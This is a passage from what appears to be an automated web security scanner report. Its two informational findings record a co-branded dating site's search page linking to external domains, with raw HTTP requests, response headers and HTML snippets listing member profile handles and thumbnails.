id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl17_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=9JQjSyzdx69K3RIBpC92dQ%3d%3d&amp;Handle=Boston77girl&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl17_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/45/38/98814538C.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
d="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl18_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=R8Uc%2fQWk8BOLxpdnSjXByA%3d%3d&amp;Handle=coronababe03&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl18_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/95/41/98779541C.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl19_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=w6ckfdBFoAYVVjMjOBmq8w%3d%3d&amp;Handle=critter468&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl19_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/64/38/67796438A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
tl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl20_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=T5r%2fxpB6KZOnu8N9P5Mw9A%3d%3d&amp;Handle=devoted_baby1981&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl20_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/68/17/98866817A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl21_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=WHPWyT7e53PQljUU%2fVbIiA%3d%3d&amp;Handle=audrey1luv&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl21_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/92/60/56279260A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl22_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=jg%2bhAv%2bSqF8mnk%2b40bB2pg%3d%3d&amp;Handle=xuemmy&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl22_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/36/27/98853627C.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl23_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=6u0%2bLwk%2bFd5Khe2zdzJuzw%3d%3d&amp;Handle=unwented&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl23_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/12/44/98841244A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl24_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=sjp1%2fW2nCvYeRSa2km2qFw%3d%3d&amp;Handle=aliciadugan&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl24_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/26/49/98792649A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
l00$userName$ctl00$txtUserNameSearch" type="text" value="enter username here" maxlength="75" id="ctl00_workarea_mySearchIndex_ctl00_userName_ctl00_txtUserNameSearch" class="userSearch watermarkOn" />
<img id="ctl00_workarea_mySearchIndex_ctl00_userName_ctl00_Image1" class="goBtn" alt="Go" src="http://images.match.com/match/search/v2/goBtn.gif" style="height:26px;width:36px;border-width:0px;" />
       </div>
...[SNIP]...
<li><a href="http://match.mediaroom.com?lid=4">Media Room</a>
...[SNIP]...
<li><a href="http://success.match.com/index.aspx?lid=4">Success Stories</a>
...[SNIP]...
<a id="ctl00_matchFooter_ctl00_HyperLink1" href="/cp/social/r/officialblog.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image1" title="Check out our blog" src="http://images.match.com/match/footer/ico_blg.gif" alt="Check out or blog" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink2" href="/cp/social/r/facebook.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image2" title="Like us on facebook" src="http://images.match.com/match/footer/ico_fb.gif" alt="Like Us on Facebook" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink3" href="/cp/social/r/twitter.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image3" title="Follow us on twitter" src="http://images.match.com/match/footer/ico_twtr.gif" alt="Follow Us on Twitter" style="border-width:0px;" /></a>
...[SNIP]...
<li><a href="http://www.domania.com/">Domania</a>
...[SNIP]...
<li><a href="http://www.expedia.com/">Expedia</a>
...[SNIP]...
<li><a href="http://www.getsmart.com/">GetSmart</a>
...[SNIP]...
<li><a href="http://www.hotels.com/">Hotels</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/">Hotwire</a>
...[SNIP]...
<li><a href="http://www.livenation.com/">Live Nation</a>
...[SNIP]...
<li><a href="http://www.ticketmaster.com/">Ticketmaster</a>
...[SNIP]...
<li class="plLast"><a href="http://www.match.com/">Online Dating</a>
...[SNIP]...

22.69. http://dating.redacted/search/index.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.redacted
Path:   /search/index.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search/index.aspx?TrackingID=516163&BannerID=723032&q=man,woman,18,35 HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 16:43:56 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/30/2011; expires=Mon, 30-Jan-2012 16:43:55 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/30/2011; domain=match.com; expires=Mon, 30-Jan-2012 16:43:55 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/30/2011&UMID=adefdd61-6c29-4b05-8083-58c164731ea1; expires=Mon, 30-Jan-2012 16:43:55 GMT; path=/
Set-Cookie: SECU=TID=516163&ESID=b4c657c9-cb38-4592-8ef4-2cb63765b01b&THEME=214; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />

<!-- BEGIN OMNITURE REPORTING -->
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=AX">Bing</a>
...[SNIP]...
<li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://passport.match.com/passport/ppLogin.asp">Sign in</a>
...[SNIP]...
<div id="optlinks" class="link"><img class="logo" src="http://images.match.com/match/msn/cobrand/poweredby_Match.png" alt="powered by Match.com" /></div>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<a href="http://dating.msn.com/index.aspx?lid=2&amp;ird=1"><img src="http://images.match.com/match/presentations/nonemoreblack/header/13163_matchLogo.gif" alt="match.com" style="border-width:0px;" /></a>
...[SNIP]...
<div class="close modal_dismiss">
    <img id="ctl00_matchHeader_ctl00_Image10" alt="Close" src="http://images.match.com/match/doubleblind/xCloseModal.gif" style="height:16px;width:16px;border-width:0px;" />
    </div>
...[SNIP]...
<a id="ctl00_matchHeader_ctl00_HyperLink6" href="http://dating.msn.com/subscribe/subscribe.aspx?lid=1"><img id="ctl00_matchHeader_ctl00_Image5" src="http://images.match.com/match/presentations/nonemoreblack/header/13272_subscribe_fin_becauseofyou.gif" style="border-width:0px;" />
                   <!-- Start //WI: 9402: blue "Subscribe Today" banner 100% on the sharkin : SM -09/11 -->
...[SNIP]...
<a id="ctl00_matchHeader_ctl00_Hyperlink13" class="iGuideFin" href="/cp.aspx?cpp=/en-us/match/whitneycasey/video.html&amp;linkid=1"><img id="ctl00_matchHeader_ctl00_Image7" src="http://images.match.com/match/presentations/nonemoreblack/header/15446_tipsFin.gif" alt="Rev Up Your love Life With These Tips!" style="border-width:0px;" /></a>
...[SNIP]...
</div>
   <img alt="Search Now" border="0" class="btnQuickSearch" src="http://images.match.com/match/search/redesign/quickSearchBtn.gif" style="height:29px;width:132px;border-width:0px;" />
   <input type="hidden" name="cl" value="1" id="cl" />
...[SNIP]...
="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl01_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=0JQZdpNP5OrbXllQ%2fbI1Aw%3d%3d&amp;Handle=lashworth1985&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl01_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/14/75/98911475C.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl02_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=p%2fE8DaC3%2fIQ0G5oS2VqWbg%3d%3d&amp;Handle=MamaLiz25&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl02_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/01/50/98910150A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl03_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=UNEgG0DNlaDMtia6akQQHQ%3d%3d&amp;Handle=cindydane84&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl03_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/87/69/98908769A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
tl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl04_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=y0VvZom1xiajEG4t%2f9%2b05g%3d%3d&amp;Handle=uopstudent1979&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl04_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/52/13/98905213A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
"ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl05_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=IVxrquLB7xMmiP31seW7lQ%3d%3d&amp;Handle=YouSweetestThing&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl05_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/54/04/98895404A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
"ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl06_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=PPXvaOqh%2fiGTYB7Zcj5%2bWg%3d%3d&amp;Handle=cntrygrlFL03&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl06_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/72/30/98887230A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl07_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=1tAt3V5Vl4LaKG%2bSph1Kyg%3d%3d&amp;Handle=Negritadr1&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl07_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/70/68/98887068A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl08_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=lrW8m0Xg9DjqGtRTVuUU%2bQ%3d%3d&amp;Handle=sweetietta&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl08_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/12/36/98881236A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl09_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=ZuYSmImyQOVimZrygEiUjg%3d%3d&amp;Handle=11_Becky&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl09_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/26/22/98852622A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl10_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=8jF7LukRM1GSgPwQTna7wg%3d%3d&amp;Handle=suthrnangl85&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl10_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/26/22/98842622A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl11_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=EGWadjaKNhMWpVaPtnAb6g%3d%3d&amp;Handle=gottasmile80&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl11_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/45/56/98904556A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl12_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=Kh%2f4bnsmVHfjcE9atse0Rg%3d%3d&amp;Handle=tig14ger&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl12_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/71/19/98897119A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl13_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=tI6vsEKQxvoMZghiRsnY%2fg%3d%3d&amp;Handle=shannahs79&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl13_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/53/79/98895379A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl14_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=Oa1JuRNL8x2KMBnXi6B97g%3d%3d&amp;Handle=liliy23657&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl14_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/92/18/98889218B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl15_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=fM1DMT3vVr%2fiUhCsw39p6g%3d%3d&amp;Handle=amberedhead&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl15_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/61/11/98886111B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl16_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=U2jhBXT7pHakqYz6EHAYQA%3d%3d&amp;Handle=jessbella420&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl16_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/53/30/98885330G.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
d="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl17_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=1F1jAZT59U3oy7HfStabeg%3d%3d&amp;Handle=bb27clearwater&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl17_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/40/23/98884023A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl18_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=%2bUC%2fRXlrhWVCcGTUH3W40Q%3d%3d&amp;Handle=Lilbit852&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl18_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/00/05/98880005A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl19_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=p6YAUc70MYDXtGL42OLjlQ%3d%3d&amp;Handle=arieslove99&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl19_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/96/55/98879655A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl20_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=nJ7odq9Vz3wnUxRtrsEmZw%3d%3d&amp;Handle=superwoman714&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl20_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/57/46/97805746A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl21_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=eg%2feI%2bqTsWgMhfvom9EzQQ%3d%3d&amp;Handle=jenfoora&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl21_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/04/76/96620476B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl22_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=92zs6ZtPnWz1YyfUVo8IDA%3d%3d&amp;Handle=Jko11&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl22_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/52/69/98865269A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl23_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=VaQTX1WRNWTULEdP4quVvA%3d%3d&amp;Handle=emily1075&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl23_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/63/42/98856342B.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
<a id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl24_SubscribeProfileLink" href="/profile/showprofile.aspx?uid=8JcErDu3UF1HtbKP0h5HsA%3d%3d&amp;Handle=tins29&amp;lid=18"><img id="ctl00_workarea_mySearchIndex_ctl00_newestMemberControl_ctl00_ctl00_ctl24_UserPhotoImage1" class="profilePic" alt="" src="http://sthumbnails.match.com/sthumbnails/87/93/66168793A.jpeg" style="height:49px;width:38px;border-width:0px;" /></a>
...[SNIP]...
l00$userName$ctl00$txtUserNameSearch" type="text" value="enter username here" maxlength="75" id="ctl00_workarea_mySearchIndex_ctl00_userName_ctl00_txtUserNameSearch" class="userSearch watermarkOn" />
<img id="ctl00_workarea_mySearchIndex_ctl00_userName_ctl00_Image1" class="goBtn" alt="Go" src="http://images.match.com/match/search/v2/goBtn.gif" style="height:26px;width:36px;border-width:0px;" />
       </div>
...[SNIP]...
<li><a href="http://match.mediaroom.com?lid=4">Media Room</a>
...[SNIP]...
<li><a href="http://success.match.com/index.aspx?lid=4">Success Stories</a>
...[SNIP]...
<a id="ctl00_matchFooter_ctl00_HyperLink1" href="/cp/social/r/officialblog.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image1" title="Check out our blog" src="http://images.match.com/match/footer/ico_blg.gif" alt="Check out or blog" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink2" href="/cp/social/r/facebook.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image2" title="Like us on facebook" src="http://images.match.com/match/footer/ico_fb.gif" alt="Like Us on Facebook" style="border-width:0px;" /></a>
            <a id="ctl00_matchFooter_ctl00_HyperLink3" href="/cp/social/r/twitter.html?lid=4" target="_blank"><img id="ctl00_matchFooter_ctl00_Image3" title="Follow us on twitter" src="http://images.match.com/match/footer/ico_twtr.gif" alt="Follow Us on Twitter" style="border-width:0px;" /></a>
...[SNIP]...
<li><a href="http://www.domania.com/">Domania</a>
...[SNIP]...
<li><a href="http://www.expedia.com/">Expedia</a>
...[SNIP]...
<li><a href="http://www.getsmart.com/">GetSmart</a>
...[SNIP]...
<li><a href="http://www.hotels.com/">Hotels</a>
...[SNIP]...
<li><a href="http://www.hotwire.com/">Hotwire</a>
...[SNIP]...
<li><a href="http://www.livenation.com/">Live Nation</a>
...[SNIP]...
<li><a href="http://www.ticketmaster.com/">Ticketmaster</a>
...[SNIP]...
<li class="plLast"><a href="http://www.match.com/">Online Dating</a>
...[SNIP]...

22.70. http://dating.redacted/search/index.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dating.redacted
Path:   /search/index.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /search/index.aspx?TrackingID=526133&BannerID=722765&q=man,woman,18,35&gt1=26000 HTTP/1.1
Host: dating.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:45:53 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=1/29/2011; expires=Sun, 29-Jan-2012 23:45:52 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=1/29/2011; domain=match.com; expires=Sun, 29-Jan-2012 23:45:52 GMT; path=/
Set-Cookie: MatchSession=CDTF=1/29/2011&UMID=efa3bd63-3319-4bff-b51e-259e925072d2; expires=Sun, 29-Jan-2012 23:45:52 GMT; path=/
Set-Cookie: SECU=TID=526133&ESID=10898926-f1e5-42e4-9e32-729ac271acf4&THEME=215; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 84446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
   <head><meta http-equiv=
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script><!--<![endif]-->

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />

<!-- BEGIN OMNITURE REPORTING -->
...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
